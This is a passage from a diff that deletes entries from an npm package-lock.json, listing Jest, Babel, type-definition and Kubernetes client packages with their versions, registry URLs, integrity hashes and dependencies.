- "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "dependencies": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" - } - }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "dependencies": { - "undici-types": "~6.20.0" - } - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": 